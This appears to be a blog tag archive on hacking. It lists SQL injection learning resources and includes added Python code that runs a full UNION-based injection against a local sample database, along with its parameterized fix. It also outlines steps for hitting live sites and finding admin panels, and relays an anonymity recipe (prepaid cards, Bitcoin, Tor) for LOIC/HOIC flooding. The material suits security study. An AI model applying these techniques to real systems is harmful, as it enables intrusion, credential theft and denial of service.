Tag Archives: hacking
In my previous post in the hacker series, http://decisionstats.com/2013/03/20/hacking-for-beginners-top-website-hacks/ , we noted that SQL injection remains one of the top security vulnerabilities. Accordingly, here is a list of resources for learning SQL injection.
SQL injection is a code injection technique that exploits a security vulnerability in an application's software. The vulnerability arises when user input is pasted into the text of an SQL statement, either without correctly filtering string-literal escape characters (such as the single quote) or without strong typing (a value expected to be a number is used as-is), so that the database cannot tell where the data ends and the code begins, and part of the input is executed as SQL. SQL injection is best known as an attack vector against websites, but it applies to any application that builds SQL queries from untrusted input, whatever the database engine.
- SQL Inject Me
SQL Inject Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.
The tool works by submitting your HTML forms with each form value replaced by strings representative of an SQL injection attack, such as database escape characters. It then looks for database error messages in the rendered HTML of the response page.
The tool does not attempt to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password cracking or firewall attacks done by the tool.
This toolbar will help you in testing for SQL injection, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site.
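The passive check described above, as an added example that is not part of the original post or of the Exploit-Me project: it performs no network requests, but takes the HTML bodies a form returned for each probe value and flags the database error messages a quote-breaking probe typically surfaces. The probe list, the response samples and the field names are constructed for this example; the error fragments are the well-known messages each engine emits for a broken string literal.

```python
"""Added example (not part of the original post or the Exploit-Me project):
a minimal reimplementation of the passive check SQL Inject Me performs.
Nothing is sent over the network; the function takes HTML already returned
for a probe value and reports which database engine's error leaked into it."""
import re

# Probe strings representative of what a form fuzzer substitutes into each
# field. A lone quote, or a quote followed by a comment marker, is enough to
# break string-literal quoting in a query built by concatenation.
PROBES = ["'", '"', "'--", "' OR '1'='1", "' OR 1=1--"]

# Well-known error fragments each engine emits for a broken string literal.
ERROR_SIGNATURES = {
    "mysql": re.compile(r"You have an error in your SQL syntax", re.I),
    "postgresql": re.compile(r"ERROR:\s+syntax error at or near", re.I),
    "mssql": re.compile(r"Unclosed quotation mark after the character string", re.I),
    "oracle": re.compile(r"ORA-0\d{4}"),
    "sqlite": re.compile(r'unrecognized token:|near ".*?": syntax error', re.I),
}


def detect_db_errors(html: str) -> list[str]:
    """Return the names of the backends whose error signature appears in html."""
    return [name for name, pat in ERROR_SIGNATURES.items() if pat.search(html)]


def scan_responses(responses) -> list[tuple[str, str, str]]:
    """responses: iterable of (field_name, probe_value, html_body).
    Returns (field_name, probe_value, backend) for every response that leaked
    a database error, i.e. every possible entry point worth a closer look."""
    findings = []
    for field, probe, html in responses:
        for backend in detect_db_errors(html):
            findings.append((field, probe, backend))
    return findings


# Constructed sample responses standing in for what a login and a search form
# returned for a probe value and for a benign value respectively.
SAMPLE_RESPONSES = [
    ("username", "'",
     "<html><body>Warning: mysql_fetch_array(): supplied argument is not a valid "
     "result. You have an error in your SQL syntax; check the manual that "
     "corresponds to your MySQL server version near '''' at line 1</body></html>"),
    ("username", "alice", "<html><body>Welcome, alice</body></html>"),
    ("search", "'--",
     '<html><body><pre>ERROR:  syntax error at or near "--"</pre></body></html>'),
    ("search", "books", "<html><body>3 results</body></html>"),
]

if __name__ == "__main__":
    for field, probe, backend in scan_responses(SAMPLE_RESPONSES):
        print(f"field={field!r} probe={probe!r} leaked a {backend} error")
```

A hit only means the input reached the query text unescaped; a clean response proves nothing, since an application that swallows errors can still be injectable (blind injection), which is why sqlmap below goes further and confirms by behaviour rather than by error text.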
- sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
Basic Tutorials (in order of learning)
A site for practising SQL injection attacks. It is a deliberately vulnerable test system and can be used for honing your SQL injection skills without touching a system you are not authorised to test.
Intermediate Tutorials on End to End SQL Injection
Step 1: Finding Vulnerable Website:
Step 2: Checking the Vulnerability:
To check for the vulnerability, append a single quote (') to the parameter value at the end of the URL and hit enter.
If you get a database error message back, the input is reaching the query text unescaped and the site is very likely vulnerable. The converse does not hold: a page that hides its errors can still be injectable (blind injection), so the absence of an error is not a clean bill of health.
Step 3: Finding Number of columns:
Step 4: Find the Vulnerable columns:
Step 5: Finding version,database,user
Step 6: Finding the Table Name
Step 8: Finding the Admin Panel:
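Steps 2 to 6 carried out end to end, as an added example that is not from the original post or the linked tutorials: the manual UNION-based procedure is run against a throwaway in-memory SQLite database so it works offline, and the parameterized version of the same page shows what closes the hole. The schema, rows, field names and page rendering are constructed for this example. The tutorials target MySQL; the assumption here is that the technique carries over unchanged and only the catalog names differ, so sqlite_version() and sqlite_master stand in for version() and information_schema.tables.

```python
"""Added example, not from the original post or the linked tutorials: Steps
2-6 of the manual UNION-based procedure run against a constructed in-memory
SQLite database, followed by the parameterized query that fixes the page.
sqlite_version() and sqlite_master stand in for MySQL's version() and
information_schema.tables (assumption: same technique, different catalog)."""
import sqlite3

SQLITE_VERSION = sqlite3.sqlite_version
ERROR_MARKER = "<b>Database error:</b>"


def build_db() -> sqlite3.Connection:
    """Constructed sample schema: a public table and a table worth stealing."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.5);
        CREATE TABLE admin_users(id INTEGER, username TEXT, password_hash TEXT);
        INSERT INTO admin_users VALUES (1, 'admin', 'not-a-real-hash');
    """)
    return conn


def render(row) -> str:
    # Only name and price reach the HTML; the id column never does (Step 4).
    return "<p>Not found</p>" if row is None else f"<p>{row[1]} - {row[2]}</p>"


def vulnerable_page(conn, product_id: str) -> str:
    """product.php?id=... done wrong: the raw query-string value is pasted into
    the SQL text, so the engine cannot tell where data ends and code begins."""
    sql = "SELECT id, name, price FROM products WHERE id=" + product_id
    try:
        return render(conn.execute(sql).fetchone())
    except sqlite3.Error as exc:
        return f"{ERROR_MARKER} {exc}"          # the leak that Step 2 looks for


def safe_page(conn, product_id: str) -> str:
    """The same page fixed: strongly typed input bound as a parameter, never text."""
    try:
        pid = int(product_id)
    except ValueError:
        return render(None)
    row = conn.execute("SELECT id, name, price FROM products WHERE id=?", (pid,)).fetchone()
    return render(row)


def cells(page: str) -> list[str]:
    """Split a rendered page back into the values it echoed."""
    return page.removeprefix("<p>").removesuffix("</p>").split(" - ")


def is_vulnerable(conn) -> bool:
    """Step 2: a stray single quote produces a database error."""
    return vulnerable_page(conn, "1'").startswith(ERROR_MARKER)


def count_columns(conn, max_cols: int = 10) -> int:
    """Step 3: ORDER BY n succeeds until n exceeds the number of selected columns."""
    for n in range(1, max_cols + 1):
        if vulnerable_page(conn, f"1 ORDER BY {n}--").startswith(ERROR_MARKER):
            return n - 1
    raise RuntimeError(f"more than {max_cols} columns")


def find_echoed_columns(conn, ncols: int) -> list[int]:
    """Step 4: UNION in a row of marker numbers; the markers that show up in the
    page are the column positions an attacker can read data back through."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    shown = cells(vulnerable_page(conn, f"-1 UNION SELECT {markers}--"))
    return [i for i in range(1, ncols + 1) if str(i) in shown]


def read_through(conn, ncols: int, echoed: list[int], col: int, expr: str, from_clause: str = "") -> str:
    """Put expr in echoed column col and return what the page prints for it."""
    parts = [str(i) for i in range(1, ncols + 1)]
    parts[col - 1] = expr
    page = vulnerable_page(conn, f"-1 UNION SELECT {','.join(parts)}{from_clause}--")
    return cells(page)[echoed.index(col)]


def enumerate_target(conn) -> dict:
    """Steps 2-6 chained, the way the tutorial walks through them by hand."""
    if not is_vulnerable(conn):
        return {}
    ncols = count_columns(conn)
    echoed = find_echoed_columns(conn, ncols)
    col = echoed[0]
    return {
        "columns": ncols,
        "echoed": echoed,
        "version": read_through(conn, ncols, echoed, col, "sqlite_version()"),
        "tables": read_through(conn, ncols, echoed, col, "group_concat(name)",
                               " FROM sqlite_master WHERE type='table'"),
        "admin": read_through(conn, ncols, echoed, col,
                              "username || ':' || password_hash", " FROM admin_users"),
    }


if __name__ == "__main__":
    db = build_db()
    print(enumerate_target(db))
    print(safe_page(db, "-1 UNION SELECT 1,2,3--"))   # parameterized page: Not found
```

The last line of the enumeration already reads the admin table's rows, which is where the later steps of the tutorial lead. Note that the only change in safe_page is that the value is bound as a parameter and typed as an integer; the same payloads then return "Not found" instead of data, which is the fix the definition at the top of this post points to.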
- The next tutorial uses an automated tool called Havij from
and the tutorial is at
I really liked this 2002 presentation on Website Hacks at blackhat.com/presentations/bh-asia-02/bh-asia-02-shah.pdf . It explains in an easy manner some common fundamentals of hacking websites. Take time to go through this; it's a good example of how hacking tutorials need to be created if you want to expand the number of motivated hackers.
However, a more recent list of hacks is here:
The Top Ten
- CRIME (1, 2, 3, 4) by Juliano Rizzo and Thai Duong
- Pwning via SSRF (memcached, php-fastcgi, etc) (2, 3, 4, 5)
- Chrome addon hacking (2, 3, 4, 5)
- Bruteforce of PHPSESSID
- Cross-Site Port Attacks
- Permanent backdooring of HTML5 client-side application
- CAPTCHA Re-Riding Attack
- XSS: Gaining access to HttpOnly Cookie in 2012
- Attacking OData: HTTP Verb Tunneling, Navigation Properties for Additional Data Access, System Query Options ($select)
But a more widely used ranking of website attacks is here. Note that it is a more formal, and also a more recent, document than the PDF above. If only it could be turned into an easier-to-read tutorial, it would do a great deal for web application security.
The Release Candidate for the OWASP Top 10 for 2013 is now available here: OWASP Top 10 – 2013 – Release Candidate
The OWASP Top 10 – 2013 Release Candidate includes the following changes as compared to the 2010 edition:
- A1 Injection
- A2 Broken Authentication and Session Management (was formerly A3)
- A3 Cross-Site Scripting (XSS) (was formerly A2)
- A4 Insecure Direct Object References
- A5 Security Misconfiguration (was formerly A6)
- A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection)
- A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access)
- A8 Cross-Site Request Forgery (CSRF) (was formerly A5)
- A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration)
- A10 Unvalidated Redirects and Forwards
Once again, I am presenting this as an example of how lucid documentation can help spread technological awareness to people held back by technical ignorance and lacking the savvy and chops for self-learning. If you need better cyber security, you need better documentation and tutorials on hacking, to improve the quantity and quality of the pool of available hackers and to bring in young blood to enhance your cyber security edge.
How the West Counters China
- Using the United Nations and the WTO to present evidence and push for financial penalties
- Define cyber-retaliation rules of engagement and doctrine for hacking attacks
- Delineate the blurred lines between Anonymous, state-sponsored hacks, hacktivism and cyber criminals, and build clear rules of engagement
- Provoke Chinese Naval and Air Assets (using the Opium War’s lessons)
- Create a digital cyber-warfare alliance using Australia, Japan, Taiwan, South Korea, India , Tibetan Exiles and NATO
How China can counter the West
- Build a dossier of false or misplaced allegations that are levelled at China and use it when something sticks
- Highlight Western Government’s breaches of citizen privacy and digital surveillance
- Highlight efforts of intellectual property theft, monopolistic actions and industrial espionage in the West
- Host more black hat conferences within Macau and Hong Kong if not mainland China
- Support Anonymous and Digital Activism as potential allies
“The supreme art of war is to subdue the enemy without fighting.” ― Sun Tzu
I write on and off on hackers (see http://bit.ly/VWxSvP) and even some poetry on them (http://bit.ly/11RznQl). During meetups, conferences and online discussions I run into them, I have interviewed them, and I have trained some of them (in analytics). Based on this decade-long experience of observing hackers, and two-decade-long experience of hanging out with them, some thoughts on making you a better hacker, and a happier hacker, even if you are a hacker activist or a hacker in enterprise software.
1) Everybody can be a hacker, but you need to know the basic attitude first. Not every Python or Java coder is a hacker. Coding is not hacking. More details here: http://decisionstats.com/2012/02/12/how-to-learn-to-be-a-hacker-easily/
2) Use tools like Coursera, Udacity and Codecademy to learn new languages. Even if you don't have a natural gift for memorizing syntax, some of it helps. (I forget syntax quite often. I google.)
3) Learn tools like Metasploit if you want to learn the lucrative and romantic art of exploit hacking (http://www.offensive-security.com/metasploit-unleashed/Main_Page). The demand for information security is going to be huge. Hackers with jobs are happy hackers.
4) Develop a serious downtime hobby.
Let's face it: your body was not designed to sit in front of a computer for 8 hours. But being a hacker will mean that commitment and maybe more.
This is not about hacking the cloud. Instead, this is about using the cloud to hack.
Some articles last year described how hackers used Amazon EC2 for hacking and DDoS attacks.
Roth claims that a typical wireless password can be guessed by EC2 and his software in about six minutes. He proved this by hacking networks in the area where he lives. The type of EC2 computers used in the attack costs 28 cents per minute, so $1.68 is all it could take to lay open a wireless network.
Cloud services are also attractive for hackers because the use of multiple servers can facilitate tasks such as cracking passwords, said Ray Valdes, an analyst at Gartner Inc. Amazon could improve measures to weed out bogus accounts, he said.
And this article by Anti-Sec pointed out how one can obtain a debit card anonymously:
VPN Account without paper trail
- Purchase prepaid visa card with cash
- Purchase Bitcoins with Money Order
- Donate Bitcoins to different account
Masking your IP address when logging on is done with Tor,
and the actual flooding is done by tools like LOIC or HOIC.
So what safeguards can be expected against the next wave of Teenage Mutant Ninjas?